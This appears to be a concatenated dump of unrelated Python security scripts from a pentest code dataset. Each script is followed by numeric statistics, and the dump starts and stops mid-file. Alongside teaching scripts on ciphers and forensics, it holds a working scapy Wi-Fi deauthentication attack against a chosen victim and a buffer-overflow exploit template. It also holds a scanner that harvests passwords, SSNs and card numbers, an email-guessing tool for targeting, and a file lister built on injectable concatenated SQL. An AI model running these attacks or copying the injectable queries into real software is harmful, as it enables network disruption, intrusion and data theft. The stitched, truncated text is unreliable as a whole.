plaintext_var=randomword.get_random_word() + str(random.randint(0, 1000)),
string_var=string_name,
ciphertext_var=randomword.get_random_word() + str(random.randint(0, 1000)))
code_block = [
'''import android.os.Build; import android.util.Log; import java.security.InvalidKeyException;import java.security.NoSuchAlgorithmException;import java.util.Base64;import java.util.concurrent.TimeUnit;import javax.crypto.BadPaddingException;import javax.crypto.Cipher;import javax.crypto.IllegalBlockSizeException;import javax.crypto.KeyGenerator;import javax.crypto.NoSuchPaddingException;import javax.crypto.SecretKey;''',
str_builder]
mainActivity_file_path = self._get_path_to_file("MainActivity.java")
self._add_imports_to_java_file(mainActivity_file_path, code_block[0])
self._add_java_code_to_file(mainActivity_file_path, code_block[1])
return "A series of device paramiters are being pulled off the device and immediately encrypted. However, are they in memory long enough for the data to be dumped?"
| 58.860465 | 436 | 0.632019 |
cybersecurity-penetration-testing | import sys
if len(sys.argv) !=3:
print "usage: %s name.txt email suffix" % (sys.argv[0])
sys.exit(0)
for line in open(sys.argv[1]):
name = ''.join([c for c in line if c == " " or c.isalpha()])
tokens = name.lower().split()
fname = tokens[0]
lname = tokens[-1]
print fname +lname+sys.argv[2]
print lname+fname+sys.argv[2]
print fname+"."+lname+sys.argv[2]
print lname+"."+fname+sys.argv[2]
print lname+fname[0]+sys.argv[2]
print fname+lname+fname+sys.argv[2]
print fname[0]+lname+sys.argv[2]
print fname[0]+"."+lname+sys.argv[2]
print lname[0]+"."+fname+sys.argv[2]
print fname+sys.argv[2]
print lname+sys.argv[2] | 29.047619 | 61 | 0.660317 |
cybersecurity-penetration-testing | '''
Copyright (c) 2016 Python Forensics and Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Revision History
v .95 Beta Initial Release (May 2016)
v .90 Alpha Initial Release Command Line Version (November 2015)
Writter for:
Python 2.6.x or greater (not Python 3.x)
pfDiscover Support File
Includes the FileExaminer Class
'''
# Required Python Import Standard Library Modules
import os # OS Module
import re # Regular Expression Modules
import time # Time Module
import traceback # raceback exception Module
# Psuedo Constants
MAXBUFF = 1024 * 1024 * 16 # 16 Megabytes defines the size of
# of the memory chunks read
# Class: FileExaminer Class
#
# Desc: Handles all methods related to File Based Forensics
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
def __init__(self, theFile):
#Attributes of the Object
self.lastError = "OK"
self.mactimes = ["","",""]
self.fileSize = 0
self.fileOpen = False
self.fileType = "unknown"
self.uid = 0
self.gid = 0
self.mountPoint = False
self.fileRead = False
self.md5 = ""
self.sha1 = ""
self.path = theFile
self.sha256 = ""
self.sha512 = ""
self.zipLookup = False
self.emailDict = {} # Create empty dictionaries
self.ssnDict = {}
self.urlDict = {}
self.pwDict = {}
self.ccDict = {}
self.usphDict = {}
self.zipDict = {}
self.zipDB = {}
try:
if os.path.exists(theFile):
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
self.macTimes = []
self.macTimes.append(time.ctime(theFileStat.st_mtime))
self.macTimes.append(time.ctime(theFileStat.st_atime))
self.macTimes.append(time.ctime(theFileStat.st_ctime))
# get and store the File size
self.fileSize = theFileStat.st_size
# Get and store the ownership information
self.uid = theFileStat.st_uid
self.gid = theFileStat.st_gid
if os.path.isfile(theFile):
self.fileType = "File"
# Is this a real file?
elif os.path.islink(theFile):
self.fileType = "Link"
# Is This filename actually a directory?
elif os.path.isdir(theFile):
self.fileType = "Directory"
else:
self.fileType = "Unknown"
# Is the pathname a mount point?
if os.path.ismount(theFile):
self.mountPoint = True
else:
self.mountPoint = False
# Is the file Accessible for Read?
if os.access(theFile, os.R_OK) and self.fileType == "File":
# Open the file to make sure we can access it
self.fp = open(theFile, 'rb')
self.fileOpen = True
else:
self.fileRead = False
try:
# Required zipdb comma separated value
# file containing zipcode to city lookup
with open("zipdb.csv", 'r') as zipData:
for line in zipData:
line=line.strip()
lineList = line.split(',')
if len(lineList) == 3:
key = lineList[0]
val = lineList[1:]
self.zipDB[key] = val
self.zipLookup = True
except:
traceback.print_exc()
self.zipLookup = False
else:
self.lastError = "File does not exist"
except:
self.lastError = "File Exception Raised"
# Function to Iterate through a large file
# the file was opened during init
def readBUFF(self):
# Read in a bytearray
ba = bytearray(self.fp.read(MAXBUFF))
# substitute spaces for all non-ascii characters
# this improves the performance and accuracy of the
# regular expression searches
txt = re.sub('[^A-Za-z0-9 ~!@#$%^&*:;<>,.?/\-\(\)=+_]', ' ', ba)
# Return the resulting text string that will be searched
return txt
#searches file for patterns matching
# e-mails
# SSN
# URL
# U.S. Phone Numbers
# U.S. Postal Codes
# Strong Passwords
# Credit Card Numbers
def scanMem(self, quiet):
if not quiet:
print "\nScanning Memory Image "
# compile the regular expressions
usphPattern = re.compile(r'(1?(?: |\-|\.)?(?:\(\d{3}\)|\d{3})(?: |\-|\.)?\d{3}(?: |\-|\.)?\d{4})')
emailPattern = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}')
ssnPattern = re.compile(r'\d{3}-\d{2}-\d{4}')
urlPattern = re.compile(r'\w+:\/\/[\w@][\w.:@]+\/?[\w\.?=%&=\-@/$,]*')
pwPattern = re.compile(r'[A-Za-z0-9~!@#$%^&*;:]{6,12}')
ccPattern = re.compile(r'(3[47]\d{2}([ -]?)(?!(\d)\3{5}|123456|234567|345678)\d{6}\2(?!(\d)\4{4})\d{5}|((4\d|5[1-5]|65)\d{2}|6011)([ -]?)(?!(\d)\8{3}|1234|3456|5678)\d{4}\7(?!(\d)\9{3})\d{4}\7\d{4})')
zipPattern = re.compile(r'(?!00[02-5]|099|213|269|34[358]|353|419|42[89]|51[789]|529|53[36]|552|5[67]8|5[78]9|621|6[348]2|6[46]3|659|69[4-9]|7[034]2|709|715|771|81[789]|8[3469]9|8[4568]8|8[6-9]6|8[68]7|9[02]9|987)\d{5}')
cnt = 0
gbProcessed = 0
# Iterate through the file one chunk at a time
for bArray in iter(self.readBUFF, ''):
# Provides user feedback one dot = 16MB Chunk Processed
if not quiet:
if cnt < 64:
cnt +=1
print '.',
else:
# Print GB processed
gbProcessed += 1
print
print "GB Processed: ", gbProcessed
cnt = 0
# Perform e-mail search
try:
# email
partialResult = emailPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.emailDict:
curValue = self.emailDict[key]
curValue +=1
self.emailDict[key] = curValue
else:
curValue = 1
self.emailDict[key] = curValue
except:
traceback.print_exc()
curValue = 1
self.emailDict[key] = curValue
# Search for Strong Passwords
try:
# Password
partialResult = pwPattern.findall(bArray)
for key in partialResult:
key = str(key)
upper=0
lower=0
number=0
special=0
for eachChr in key:
if eachChr in "abcdefghijklmnopqrstuvwxyz":
lower = 1
elif eachChr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper = 1
elif eachChr in '1234567890':
number = 1
elif eachChr in '~!@#$%^&*':
special = 1
if upper == 1 and lower == 1 and number == 1:
# Keep track of the number of occurrences
if key in self.pwDict:
curValue = self.pwDict[key]
curValue +=1
self.pwDict[key] = curValue
else:
curValue = 1
self.pwDict[key] = curValue
except:
curValue = 1
self.emailDict[key] = curValue
# Search for possible SS#
try:
# ssn
partialResult = ssnPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.ssnDict:
curValue = self.ssnDict[key]
curValue +=1
self.ssnDict[key] = curValue
else:
curValue = 1
self.ssnDict[key] = curValue
except:
curValue = 1
self.ssnDict[key] = curValue
# Search for URL's
try:
# url
partialResult = urlPattern.findall(bArray)
for key in partialResult:
key = str(key)
if key in self.urlDict:
curValue = self.urlDict[key]
curValue +=1
self.urlDict[key] = curValue
else:
curValue = 1
self.urlDict[key] = curValue
except:
curValue = 1
self.urlDict[key] = curValue
# Search for Credit Cards
try:
# Credit Card
partialResult = ccPattern.findall(bArray)
# Keep track of the number of occurrences
for key in partialResult:
key=str(key[0])
key = key.translate(None, '- ')
if key in self.ccDict:
curValue = self.ccDict[key]
curValue +=1
self.ccDict[key] = curValue
else:
curValue = 1
self.ccDict[key] = curValue
except:
curValue = 1
self.ccDict[key] = curValue
# Search for Phone Numbers
try:
# Phone Number
partialResult = usphPattern.findall(bArray)
for key in partialResult:
key = str(key)
key = key.strip()
if key[0] in '23456789\(':
# Keep track of the number of occurrences
if key in self.usphDict:
curValue = self.usphDict[key]
curValue +=1
self.usphDict[key] = curValue
else:
curValue = 1
self.usphDict[key] = curValue
except:
curValue = 1
self.usphDict[key] = curValue
# Search for valid US Postal Codes
try:
# Valid US Postal Codes
partialResult = zipPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.zipDict:
curValue = self.zipDict[key]
curValue +=1
self.zipDict[key] = curValue
else:
curValue = 1
self.zipDict[key] = curValue
except:
curValue = 1
self.zipDict[key] = curValue
return True
def printEmails(self):
print "\nPossible E-Mails"
print "================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printURLs(self):
print "\nPossible URLs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printSSNs(self):
print "\nPossible SSNs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printPWs(self):
print "\nPossible PWs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printCCs(self):
print "\nPossible Credit Card #s"
print "=======================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printUSPHs(self):
print "\nPossible U.S. Phone #s"
print "=====================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printZIPs(self):
print "\nPossible Valid U.S. Postal Codes"
print "================================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
print '%5d' % entry[1], '%s' % entry[0], '%s' % valList[0], '%s' % valList[1]
else:
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def csvEmails(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvEmail.csv", 'w')
tempList = ['Count', 'Possible E-mails']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvEmail.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvURLs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvURL.csv", 'w')
tempList = ['Count', 'Possible URLs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvURL.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvSSNs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvSSN.csv", 'w')
tempList = ['Count', 'Possible SSNs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvSSN.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvPWs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvPW.csv", 'w')
tempList = ['Count', 'Possible Strong Passwords']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvPW.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvCCs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvCC.csv", 'w')
tempList = ['Count', 'Possible Credit Cards']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvCC.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
def csvUSPHs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvUSPH.csv", 'w')
tempList = ['Count', 'Possible U.S. Phone Numbers']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvUSPH.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvZIPs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvZIP.csv", 'w')
tempList = ['Count', 'Possible Valid U.S.Postal Codes']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvZIP.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
outStr = ",".join([str(entry[1]), entry[0], valList[0], valList[1]])
csvFile.write(outStr)
csvFile.write("\n")
else:
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def __del__(self):
return
# End Forensic File Class ====================================
| 37.24055 | 234 | 0.439676 |
cybersecurity-penetration-testing | import os
import sys
import logging
import csv
import sqlite3
import argparse
import datetime
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This script uses a database to ingest and report meta data information about active entries in directories'
def main(custodian, source, db):
"""
The main function creates the database or table, logs execution status, and handles errors
:param custodian: The name of the custodian
:param source: tuple containing the mode 'input' or 'output' as the first elemnet and its arguments as the second
:param db: The filepath for the database
:return: None
"""
logging.info('Initiating SQLite database: ' + db)
conn = initDB(db)
cur = conn.cursor()
logging.info('Initialization Successful')
logging.info('Retrieving or adding custodian: ' + custodian)
custodian_id = getOrAddCustodian(cur, custodian)
while not custodian_id:
custodian_id = getOrAddCustodian(cur, custodian)
logging.info('Custodian Retrieved')
if source[0] == 'input':
logging.info('Ingesting base input directory: ' + source[1])
ingestDirectory(cur, source[1], custodian_id)
conn.commit()
logging.info('Ingest Complete')
elif source[0] == 'output':
logging.info('Preparing to write output: ' + source[1])
writeOutput(cur, source[1], custodian)
else:
raise argparse.ArgumentError('Could not interpret run time arguments')
cur.close()
conn.close()
logging.info('Script Completed')
def initDB(db_path):
"""
The initDB function opens or creates the database
:param db_path: The filepath for the database
:return: conn, the sqlite3 database connection
"""
if os.path.exists(db_path):
logging.info('Found Existing Database')
return sqlite3.connect(db_path)
else:
logging.info('Existing database not found. Initializing new database')
conn = sqlite3.connect(db_path)
cur = conn.cursor()
sql = 'CREATE TABLE Custodians (id INTEGER PRIMARY KEY, name TEXT);'
cur.execute(sql)
cur.execute('PRAGMA foreign_keys = 1;')
sql = "CREATE TABLE Files(id INTEGER PRIMARY KEY, custodian INTEGER REFERENCES Custodians(id)," \
"file_name TEXT, file_path TEXT, extension TEXT, file_size INTEGER, " \
"mtime TEXT, ctime TEXT, atime TEXT, mode INTEGER, inode INTEGER);"
cur.execute(sql)
return conn
def getOrAddCustodian(cur, custodian):
"""
The getOrAddCustodian function checks the database for a custodian and returns the ID if present;
Or otherwise creates the custodian
:param cur: The sqlite3 database cursor object
:param custodian: The name of the custodian
:return: The custodian ID or None
"""
id = getCustodian(cur, custodian)
if id:
return id[0]
else:
sql = "INSERT INTO Custodians (id, name) VALUES (null, '" + custodian + "') ;"
cur.execute(sql)
return None
def getCustodian(cur, custodian):
"""
The getCustodian function checks the database for a custodian and returns the ID if present
:param cur: The sqlite3 database cursor object
:param custodian: The name of the custodian
:return: The custodian ID
"""
sql = "SELECT id FROM Custodians WHERE name='{}';".format(custodian)
cur.execute(sql)
data = cur.fetchone()
return data
def ingestDirectory(cur, source, custodian_id):
"""
The ingestDirectory function reads file metadata and stores it in the database
:param cur: The sqlite3 database cursor object
:param source: The path for the root directory to recursively walk
:param custodian_id: The custodian ID
:return: None
"""
count = 0
for root, folders, files in os.walk(source):
for file_name in files:
meta_data = dict()
try:
meta_data['file_name'] = file_name
meta_data['file_path'] = os.path.join(root, file_name)
meta_data['extension'] = os.path.splitext(file_name)[-1]
file_stats = os.stat(meta_data['file_path'])
meta_data['mode'] = oct(file_stats.st_mode)
meta_data['inode'] = int(file_stats.st_ino)
meta_data['file_size'] = int(file_stats.st_size)
meta_data['atime'] = formatTimestamp(file_stats.st_atime)
meta_data['mtime'] = formatTimestamp(file_stats.st_mtime)
meta_data['ctime'] = formatTimestamp(file_stats.st_ctime)
except Exception as e:
logging.error('Could not gather data for file: ' + meta_data['file_path'] + e.__str__())
meta_data['custodian'] = custodian_id
columns = '","'.join(meta_data.keys())
values = '","'.join(str(x).encode('string_escape') for x in meta_data.values())
sql = 'INSERT INTO Files ("' + columns + '") VALUES ("' + values + '")'
cur.execute(sql)
count += 1
logging.info('Stored meta data for ' + str(count) + ' files.')
def formatTimestamp(ts):
"""
The formatTimestamp function formats an integer to a string timestamp
:param ts: An integer timestamp
:return: ts_format, a formatted (YYYY-MM-DD HH:MM:SS) string
"""
ts_datetime = datetime.datetime.fromtimestamp(ts)
ts_format = ts_datetime.strftime('%Y-%m-%d %H:%M:%S')
return ts_format
def writeOutput(cur, source, custodian):
"""
The writeOutput function handles writing either the CSV or HTML reports
:param cur: The sqlite3 database cursor object
:param source: The output filepath
:param custodian: Name of the custodian
:return: None
"""
custodian_id = getCustodian(cur, custodian)
if custodian_id:
custodian_id = custodian_id[0]
sql = "SELECT COUNT(id) FROM Files where custodian = '" + str(custodian_id) + "'"
cur.execute(sql)
count = cur.fetchone()
else:
logging.error('Could not find custodian in database. '
'Please check the input of the custodian name and database path')
if not count or not count[0] > 0:
logging.error('Files not found for custodian')
elif source.endswith('.csv'):
writeCSV(cur, source, custodian_id)
elif source.endswith('.html'):
writeHTML(cur, source, custodian_id, custodian)
elif not (source.endswith('.html')or source.endswith('.csv')):
logging.error('Could not determine file type')
else:
logging.error('Unknown Error Occurred')
def writeCSV(cur, source, custodian_id):
"""
The writeCSV function generates a CSV report from the Files table
:param cur: The Sqlite3 database cursor object
:param source: The output filepath
:param custodian_id: The custodian ID
:return: None
"""
sql = "SELECT * FROM Files where custodian = '" + str(custodian_id) + "'"
cur.execute(sql)
column_names = [description[0] for description in cur.description]
logging.info('Writing CSV report')
with open(source, 'w') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(column_names)
for entry in cur.fetchall():
csv_writer.writerow(entry)
csv_file.flush()
logging.info('CSV report completed: ' + source)
def writeHTML(cur, source, custodian_id, custodian_name):
"""
The writeHTML function generates an HTML report from the Files table
:param cur: The sqlite3 database cursor object
:param source: The output filepath
:param custodian_id: The custodian ID
:return: None
"""
sql = "SELECT * FROM Files where custodian = '" + str(custodian_id) + "'"
cur.execute(sql)
column_names = [description[0] for description in cur.description]
table_header = '</th><th>'.join(column_names)
table_header = '<tr><th>' + table_header + '</th></tr>'
logging.info('Writing HTML report')
with open(source, 'w') as html_file:
html_string = "<html><body>\n"
html_string += '<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">\n'
html_string += "<h1>File Listing for Custodian ID: " + str(custodian_id) + ", " + custodian_name + "</h1>\n"
html_string += "<table class='table table-hover table-striped'>\n"
html_file.write(html_string)
html_file.write(table_header)
for entry in cur.fetchall():
row_data = "</td><td>".join([str(x).encode('utf-8') for x in entry])
html_string = "\n<tr><td>" + row_data + "</td></tr>"
html_file.write(html_string)
html_file.flush()
html_string = "\n</table>\n</body></html>"
html_file.write(html_string)
logging.info('HTML Report completed: ' + source)
if __name__ == '__main__':
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('CUSTODIAN', help='Name of custodian collection is of.')
parser.add_argument('DB_PATH', help='File path and name of database file to create/append.')
parser.add_argument('--input', help='Base directory to scan.')
parser.add_argument('--output', help='Output file to write to. use `.csv` extension for CSV and `.html` for HTML')
parser.add_argument('-l', help='File path and name of log file.')
args = parser.parse_args()
if args.input:
source = ('input', args.input)
elif args.output:
source = ('output', args.output)
else:
raise argparse.ArgumentError('Please specify input or output')
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l) # create log directory path
log_path = os.path.join(args.l, 'file_lister.log')
else:
log_path = 'file_lister.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
logging.info('Starting File Lister v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
args_dict = {'custodian': args.CUSTODIAN, 'source': source, 'db': args.DB_PATH}
main(**args_dict) | 38.67037 | 128 | 0.615219 |
cybersecurity-penetration-testing | # RSA Key Generator
# http://inventwithpython.com/hacking (BSD Licensed)
import random, sys, os, rabinMiller, cryptomath
def main():
# create a public/private keypair with 1024 bit keys
print('Making key files...')
makeKeyFiles('al_sweigart', 1024)
print('Key files made.')
def generateKey(keySize):
# Creates a public/private key pair with keys that are keySize bits in
# size. This function may take a while to run.
# Step 1: Create two prime numbers, p and q. Calculate n = p * q.
print('Generating p prime...')
p = rabinMiller.generateLargePrime(keySize)
print('Generating q prime...')
q = rabinMiller.generateLargePrime(keySize)
n = p * q
# Step 2: Create a number e that is relatively prime to (p-1)*(q-1).
print('Generating e that is relatively prime to (p-1)*(q-1)...')
while True:
# Keep trying random numbers for e until one is valid.
e = random.randrange(2 ** (keySize - 1), 2 ** (keySize))
if cryptomath.gcd(e, (p - 1) * (q - 1)) == 1:
break
# Step 3: Calculate d, the mod inverse of e.
print('Calculating d that is mod inverse of e...')
d = cryptomath.findModInverse(e, (p - 1) * (q - 1))
publicKey = (n, e)
privateKey = (n, d)
print('Public key:', publicKey)
print('Private key:', privateKey)
return (publicKey, privateKey)
def makeKeyFiles(name, keySize):
# Creates two files 'x_pubkey.txt' and 'x_privkey.txt' (where x is the
# value in name) with the the n,e and d,e integers written in them,
# delimited by a comma.
# Our safety check will prevent us from overwriting our old key files:
if os.path.exists('%s_pubkey.txt' % (name)) or os.path.exists('%s_privkey.txt' % (name)):
sys.exit('WARNING: The file %s_pubkey.txt or %s_privkey.txt already exists! Use a different name or delete these files and re-run this program.' % (name, name))
publicKey, privateKey = generateKey(keySize)
print()
print('The public key is a %s and a %s digit number.' % (len(str(publicKey[0])), len(str(publicKey[1]))))
print('Writing public key to file %s_pubkey.txt...' % (name))
fo = open('%s_pubkey.txt' % (name), 'w')
fo.write('%s,%s,%s' % (keySize, publicKey[0], publicKey[1]))
fo.close()
print()
print('The private key is a %s and a %s digit number.' % (len(str(publicKey[0])), len(str(publicKey[1]))))
print('Writing private key to file %s_privkey.txt...' % (name))
fo = open('%s_privkey.txt' % (name), 'w')
fo.write('%s,%s,%s' % (keySize, privateKey[0], privateKey[1]))
fo.close()
# If makeRsaKeys.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 36.986486 | 169 | 0.614235 |
cybersecurity-penetration-testing | # Vigenere Cipher Dictionary Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import detectEnglish, vigenereCipher, pyperclip
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenere(ciphertext)
if hackedMessage != None:
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenere(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # remove the newline at the end
decryptedText = vigenereCipher.decryptMessage(word, ciphertext)
if detectEnglish.isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found.
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
| 31.75 | 81 | 0.605806 |
cybersecurity-penetration-testing | import Queue
import threading
import screenshot
import requests
portList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]
IP = '127.0.0.1'
http = 'http://'
https = 'https://'
def testAndSave(protocol, portNumber):
url = protocol + IP + ':' + str(portNumber)
try:
r = requests.get(url,timeout=1)
if r.status_code == 200:
print 'Found site on ' + url
s = screenshot.Screenshot()
image = s.get_image(url)
image.save(str(portNumber) + '.png')
except:
pass
def threader(q, port):
q.put(testAndSave(http, port))
q.put(testAndSave(https, port))
q = Queue.Queue()
for port in portList:
t = threading.Thread(target=threader, args=(q, port))
t.deamon = True
t.start()
s = q.get()
| 21.657895 | 85 | 0.57093 |
Python-Penetration-Testing-for-Developers | #!/us/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: tcp_exploit.py
Purpose: An sample exploit for testing TCP services
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, strut
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.sendto(exploit, (rhost, rport))
| 44.488372 | 89 | 0.774936 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
import sys
interface = "mon0"
BSSID = raw_input("Enter the MAC of AP ")
victim_mac = raw_input("Enter the MAC of Victim ")
frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth()
sendp(frame,iface=interface, count= 1000, inter= .1)
| 27.6 | 82 | 0.722807 |
owtf | """
GREP Plugin for Spiders,Crawlers and Robots
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Robots meta tag and X-Robots-Tag HTTP header"
def run(PluginInfo):
title = "This plugin looks for Robots meta tag and X-Robots-Tag HTTP header<br />"
Content = plugin_helper.HtmlString(title)
Content += plugin_helper.FindResponseHeaderMatchesForRegexpName(
"HEADERS_FOR_ROBOTS"
)
Content += plugin_helper.FindResponseBodyMatchesForRegexpName(
"RESPONSE_REGEXP_FOR_ROBOTS_META_TAG"
)
return Content
| 32.9 | 91 | 0.741507 |
PenetrationTestingScripts | """Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
v2.1.1
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses arbitrarily invalid XML- or HTML-like substance
into a tree representation. It provides methods and Pythonic idioms
that make it easy to search and modify the tree.
